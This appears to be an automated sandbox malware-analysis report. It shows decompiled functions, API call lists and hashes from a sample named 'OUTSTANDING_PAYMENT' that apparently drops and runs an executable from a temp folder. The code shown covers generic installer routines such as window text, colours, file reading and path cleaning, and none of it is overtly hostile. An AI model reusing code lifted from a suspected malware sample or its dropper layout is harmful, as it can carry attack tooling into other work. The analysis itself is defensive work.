                                                                                                                        0x0040686d
                                                                                                                        0x0040686d
                                                                                                                        0x00406888
                                                                                                                        0x0040688b
                                                                                                                        0x0040684f
                                                                                                                        0x00406850
                                                                                                                        0x00406850
                                                                                                                        0x00000000
                                                                                                                        0x0040688b
                                                                                                                        0x00406771
                                                                                                                        0x00406775
                                                                                                                        0x00406775
                                                                                                                        0x00406776
                                                                                                                        0x00406778
                                                                                                                        0x004067b5
                                                                                                                        0x004067b8
                                                                                                                        0x004067c8
                                                                                                                        0x004067cb
                                                                                                                        0x004067d3
                                                                                                                        0x004067d9
                                                                                                                        0x004067d9
                                                                                                                        0x00406834
                                                                                                                        0x00406834
                                                                                                                        0x00406836
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004067dd
                                                                                                                        0x004067e2
                                                                                                                        0x004067e3
                                                                                                                        0x004067e5
                                                                                                                        0x004067fc
                                                                                                                        0x0040680a
                                                                                                                        0x00406810
                                                                                                                        0x00406812
                                                                                                                        0x00406830
                                                                                                                        0x00406830
                                                                                                                        0x00406830
                                                                                                                        0x00000000
                                                                                                                        0x00406830
                                                                                                                        0x00406818
                                                                                                                        0x00406821
                                                                                                                        0x00406824
                                                                                                                        0x0040682a
                                                                                                                        0x0040682e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040682e
                                                                                                                        0x004067f6
                                                                                                                        0x004067f8
                                                                                                                        0x004067fa
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004067fa
                                                                                                                        0x00000000
                                                                                                                        0x00406834
                                                                                                                        0x004067c0
                                                                                                                        0x00000000
                                                                                                                        0x0040677a
                                                                                                                        0x00406798
                                                                                                                        0x004067a1
                                                                                                                        0x0040683e
                                                                                                                        0x00406842
                                                                                                                        0x0040684a
                                                                                                                        0x0040684a
                                                                                                                        0x00000000
                                                                                                                        0x00406842
                                                                                                                        0x004067ab
                                                                                                                        0x00406838
                                                                                                                        0x0040683c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040683c
                                                                                                                        0x00406778
                                                                                                                        0x00000000
                                                                                                                        0x00406705

                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,00000400), ref: 004067C0
                                                                                                                        • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                                                        • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                        • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                        • API String ID: 4260037668-684144991
                                                                                                                        • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                                                        • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                                                                        • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                                                        • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                                                                        0x004056d0
                                                                                                                        0x004056da
                                                                                                                        0x004056df
                                                                                                                        0x004056e5
                                                                                                                        0x004056f0
                                                                                                                        0x004056f3
                                                                                                                        0x004056f6
                                                                                                                        0x004056fc
                                                                                                                        0x004056fc
                                                                                                                        0x00405702
                                                                                                                        0x0040570a
                                                                                                                        0x0040570d
                                                                                                                        0x0040572a
                                                                                                                        0x0040572e
                                                                                                                        0x00405737
                                                                                                                        0x00405737
                                                                                                                        0x00405741
                                                                                                                        0x0040574a
                                                                                                                        0x00405756
                                                                                                                        0x0040575d
                                                                                                                        0x00405761
                                                                                                                        0x00405764
                                                                                                                        0x00405777
                                                                                                                        0x00405785
                                                                                                                        0x00405785
                                                                                                                        0x00405789
                                                                                                                        0x0040578b
                                                                                                                        0x0040578e
                                                                                                                        0x00000000
                                                                                                                        0x0040578e
                                                                                                                        0x0040570f
                                                                                                                        0x00405717
                                                                                                                        0x0040571f
                                                                                                                        0x00405725
                                                                                                                        0x00000000
                                                                                                                        0x00405725
                                                                                                                        0x0040571f
                                                                                                                        0x0040570d
                                                                                                                        0x0040579a

                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                        • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                        • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                                        • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                          • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                          • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                        • String ID: ('B
                                                                                                                        • API String ID: 1495540970-2332581011
                                                                                                                        • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                                                        • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                                                                                        • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                                                                                        • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                                                        0x0040463d
                                                                                                                        0x004046f3
                                                                                                                        0x00000000
                                                                                                                        0x004046f3
                                                                                                                        0x0040464e
                                                                                                                        0x00404652
                                                                                                                        0x00000000
                                                                                                                        0x0040466c
                                                                                                                        0x0040466c
                                                                                                                        0x00404675
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404677
                                                                                                                        0x00404683
                                                                                                                        0x00404686
                                                                                                                        0x00404686
                                                                                                                        0x0040468c
                                                                                                                        0x00404692
                                                                                                                        0x00404692
                                                                                                                        0x0040469e
                                                                                                                        0x004046a4
                                                                                                                        0x004046ab
                                                                                                                        0x004046ae
                                                                                                                        0x004046b1
                                                                                                                        0x004046b3
                                                                                                                        0x004046b3
                                                                                                                        0x004046bb
                                                                                                                        0x004046c1
                                                                                                                        0x004046c1
                                                                                                                        0x004046cb
                                                                                                                        0x004046d0
                                                                                                                        0x004046d3
                                                                                                                        0x004046d8
                                                                                                                        0x004046db
                                                                                                                        0x004046db
                                                                                                                        0x004046eb
                                                                                                                        0x004046eb
                                                                                                                        0x00000000
                                                                                                                        0x004046ee

                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                                                        • GetSysColor.USER32(00000000), ref: 00404686
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                                                        • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                                                        • GetSysColor.USER32(?), ref: 004046B1
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                                                        • DeleteObject.GDI32(?), ref: 004046DB
                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2320649405-0
                                                                                                                        • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                        • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                                                        • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                        • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 87%
                                                                                                                        			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                                                        0x004026ec
                                                                                                                        0x004026ee
                                                                                                                        0x004026f1
                                                                                                                        0x004026f3
                                                                                                                        0x004026f6
                                                                                                                        0x004026fb
                                                                                                                        0x004026ff
                                                                                                                        0x00402702
                                                                                                                        0x00402705
                                                                                                                        0x00402c2a
                                                                                                                        0x00402c2d
                                                                                                                        0x0040270b
                                                                                                                        0x0040270b
                                                                                                                        0x00402712
                                                                                                                        0x00402714
                                                                                                                        0x00402714
                                                                                                                        0x0040271a
                                                                                                                        0x0040287e
                                                                                                                        0x0040287e
                                                                                                                        0x00402881
                                                                                                                        0x00402886
                                                                                                                        0x004015b6
                                                                                                                        0x0040292e
                                                                                                                        0x0040292e
                                                                                                                        0x00000000
                                                                                                                        0x00402720
                                                                                                                        0x00402721
                                                                                                                        0x0040272c
                                                                                                                        0x0040272f
                                                                                                                        0x0040273b
                                                                                                                        0x0040273f
                                                                                                                        0x004027d7
                                                                                                                        0x004027ef
                                                                                                                        0x004027ff
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00402745
                                                                                                                        0x00402745
                                                                                                                        0x00402748
                                                                                                                        0x00402749
                                                                                                                        0x0040274c
                                                                                                                        0x00402751
                                                                                                                        0x00402758
                                                                                                                        0x00402760
                                                                                                                        0x00000000
                                                                                                                        0x00402766
                                                                                                                        0x00402766
                                                                                                                        0x0040276b
                                                                                                                        0x00000000
                                                                                                                        0x00402771
                                                                                                                        0x00402771
                                                                                                                        0x00402779
                                                                                                                        0x0040277c
                                                                                                                        0x0040277f
                                                                                                                        0x0040283a
                                                                                                                        0x00402841
                                                                                                                        0x00402785
                                                                                                                        0x0040278b
                                                                                                                        0x00402797
                                                                                                                        0x00402801
                                                                                                                        0x00402801
                                                                                                                        0x00402799
                                                                                                                        0x00402799
                                                                                                                        0x0040279c
                                                                                                                        0x0040279e
                                                                                                                        0x0040279e
                                                                                                                        0x0040279e
                                                                                                                        0x004027a1
                                                                                                                        0x004027a6
                                                                                                                        0x004027a9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004027ab
                                                                                                                        0x004027ae
                                                                                                                        0x004027bc
                                                                                                                        0x004027c2
                                                                                                                        0x004027d0
                                                                                                                        0x00000000
                                                                                                                        0x004027d2
                                                                                                                        0x00000000
                                                                                                                        0x004027d2
                                                                                                                        0x00000000
                                                                                                                        0x004027d0
                                                                                                                        0x0040279e
                                                                                                                        0x00402804
                                                                                                                        0x00402807
                                                                                                                        0x00000000
                                                                                                                        0x00402809
                                                                                                                        0x0040280e
                                                                                                                        0x0040284f
                                                                                                                        0x00402871
                                                                                                                        0x00402878
                                                                                                                        0x0040285d
                                                                                                                        0x0040285d
                                                                                                                        0x00402860
                                                                                                                        0x00402863
                                                                                                                        0x00402866
                                                                                                                        0x00402866
                                                                                                                        0x00000000
                                                                                                                        0x00402817
                                                                                                                        0x00402817
                                                                                                                        0x0040281a
                                                                                                                        0x0040281d
                                                                                                                        0x00402823
                                                                                                                        0x00402827
                                                                                                                        0x0040282a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040282a
                                                                                                                        0x0040280e
                                                                                                                        0x00402807
                                                                                                                        0x0040277f
                                                                                                                        0x0040276b
                                                                                                                        0x00402760
                                                                                                                        0x00000000
                                                                                                                        0x0040282c
                                                                                                                        0x0040282c
                                                                                                                        0x0040282f
                                                                                                                        0x00402838
                                                                                                                        0x00000000
                                                                                                                        0x0040272f
                                                                                                                        0x0040271a
                                                                                                                        0x00402c33
                                                                                                                        0x00402c39

                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                          • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                        • String ID: 9
                                                                                                                        • API String ID: 163830602-2366072709
                                                                                                                        • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                                                        • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                                                        • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                                                        • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 91%
                                                                                                                        			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                        0x004068f1
                                                                                                                        0x004068fa
                                                                                                                        0x00406911
                                                                                                                        0x00406911
                                                                                                                        0x00406918
                                                                                                                        0x00406924
                                                                                                                        0x00406924
                                                                                                                        0x00406927
                                                                                                                        0x0040692a
                                                                                                                        0x0040692f
                                                                                                                        0x00406931
                                                                                                                        0x0040693a
                                                                                                                        0x0040693e
                                                                                                                        0x0040695b
                                                                                                                        0x00406963
                                                                                                                        0x00406963
                                                                                                                        0x00406968
                                                                                                                        0x0040696a
                                                                                                                        0x0040696d
                                                                                                                        0x00406972
                                                                                                                        0x00406973
                                                                                                                        0x00406977
                                                                                                                        0x00406977
                                                                                                                        0x00406978
                                                                                                                        0x0040697f
                                                                                                                        0x00406981
